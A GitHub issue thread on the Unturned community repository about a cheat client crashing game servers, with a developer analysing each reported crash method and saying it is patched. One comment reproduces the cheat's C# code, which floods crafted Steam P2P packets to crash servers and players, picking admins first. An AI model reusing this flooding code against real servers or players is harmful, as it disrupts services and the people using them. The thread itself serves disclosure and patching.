### ISSUE TITLE
Cheaters can crash servers

### ISSUE THREAD

**Issue by gegtor** [SmartlyDressedGames/Unturned-3.x-Community#790]
Some cheater started crashing my server network after i banned him

Servers crash with this stacktrace https://pastebin.com/qApE67x1

I defended myself by blocking his IP in iptables

i also received this screenshot from him on my discord
![unknown-24](https://user-images.githubusercontent.com/10978723/57585673-8b9d7700-74eb-11e9-8001-b26b9cbb57ae.png)

Is there anyone else who had experience with this?

**Comment by educatalan02** [comment]
The hack is called :Thanking:
By searching on youtube there's a video with the deobfuscated code and that things.
Maybe nelson can patch It.

**Comment by Coopyy** [comment]
i've had some experience yeah

**Comment by SDGNelson** [comment]
It looks like the crash was in libmono.so caused by a duplicate free of memory. In the meantime I would suggest updating to the 64-bit linux headless server which uses a newer version of mono.

*sigh* I wonder what new exploit has been found. If anyone does have the relevant client code I'm happy to do a bug bounty type thing with the white hat hacker beret or golden trophy items, however as far as I'm aware the latest version of :thanking: isn't released yet.

**Comment by Coopyy** [comment]
yet :]

**Comment by rahemenu** [comment]
egguware!!!!!!!! arrggghhhhh

**Comment by DefCon42** [comment]
That's not a mono error; that's a double-free in steamclient.so and should probably be reported to valve with a core dump if possible, because it's at best a denial-of-service exploit and at worst potential RCE. Seems like it's something to do with disconnecting from a p2p session, from what I could tell with 5 minutes in IDA. 

Setting up a bug bounty is a good idea, like I said several months ago, but you should probably provide incentives other than stuff like in-game items. 

:thanking: release never
also coopyy ur fat

**Comment by Ascivv1** [comment]
Dang Defcon going at it with the special words

**Comment by Coopyy** [comment]
assiv gay lol

**Comment by Ascivv1** [comment]
coopy gay lol

**Comment by skippyplays** [comment]
Bad news Nelson the bug is back

**Comment by skippyplays** [comment]
I saw a user on YouTube not gonna name, names but it was thanking

**Comment by wujaxivu** [comment]
yes we know he makes tutorials for thousands

**Comment by DaemonnChumakhidze** [comment]
I'm not sure if this is going to help but I've found those lines on the latest public version _(which is used by a cheater YouTuber 3 days ago, and also recommended to download)_.
Sorry for the mess, I've tried my best to clean up the code.

```csharp
// Server crashing.
for (;;)
{
	if (OV_Provider.IsConnected && (ServerCrashThread.ServerCrashEnabled || ServerCrashThread.AlwaysCrash))
	{
		SteamNetworking.SendP2PPacket(Provider.server, new byte[]{ MiscOptions.SCrashMethod == 1 ? 1 : 24, 0, 0 }, 3, EP2PSend.k_EP2PSendUnreliableNoDelay);
	}
	else
	{
		Thread.Sleep(1000);
	}
}


// Player crashing.
[Thread]
public static void Start()
{
	for (;;)
	{
		if (PlayerCrashThread.CrashTarget != CSteamID.Nil)
		{
			SteamNetworking.SendP2PPacket(PlayerCrashThread.CrashTarget, new byte[]{ 17, 0, 0 }, 3, EP2PSend.k_EP2PSendUnreliableNoDelay);
		}
		else
		{
			Thread.Sleep(500);
		}
	}
}

[Thread]
public static void CheckThread()
{
	for (;;)
	{
		if (Provider.clients.All(p => PlayerCrashThread.CrashTarget != p.playerID.steamID))
		{
			if (PlayerCrashThread.ContinuousPlayerCrash && Provider.clients.Any())
			{
				var steamPlayer = Provider.clients
					.OrderBy(p => p.isAdmin ? 0 : 1)
					.FirstOrDefault(p => p.playerID.steamID != PlayerCrashThread.CrashTarget
										 && !FriendUtilities.IsFriendly(p.player));

				CSteamID? steamId = null;
				if (steamPlayer != null)
				{
					steamId = steamPlayer.playerID.steamID;
				}

				if (steamId != null)
				{
					PlayerCrashThread.CrashTarget = steamId.Value;
				}
			}
			else
			{
				if (PlayerCrashThread.CrashTargets.Any())
				{
					PlayerCrashThread.CrashTarget = PlayerCrashThread.CrashTargets.First(c => Provider.clients.Any(p => p.playerID.steamID == c));
				}
				else
				{
					PlayerCrashThread.CrashTarget = CSteamID.Nil;
				}
			}
		}

		Thread.Sleep(500);
	}
}
```

**Comment by DefCon42** [comment]
that code hasn't worked for months
well hypothetically

**Comment by SDGNelson** [comment]
Thanks for helping out Daemonn!
I believe that those methods have been patched, however I'll outline what they're doing here:

Server crash method 1 is spamming a request for the list of workshop content the server is using. The client requests workshop items before connecting so that it can download them, however that was patched a while ago so that the server ignores requests less than 30 seconds apart, and the client caches that response anyway.

Server crash method 2 is spamming a generic RPC, but it will get discarded as garbage by the server. In the past this did cause logging lag, and in the future I should re-activate some kicks when the server receives a lot of these packets.

Client crash method is trying to tell other clients that someone disconnected, however I doubt this worked in the first place: clients would ignore that packet from anyone except the server, and after the update that routed voice packets through the server there is no longer any peer-to-peer connections (receiving client tells Steam not to accept them)

**Comment by SDGNelson** [comment]
Closing since there's been a while without updates, but feel free to re-open with any new information.
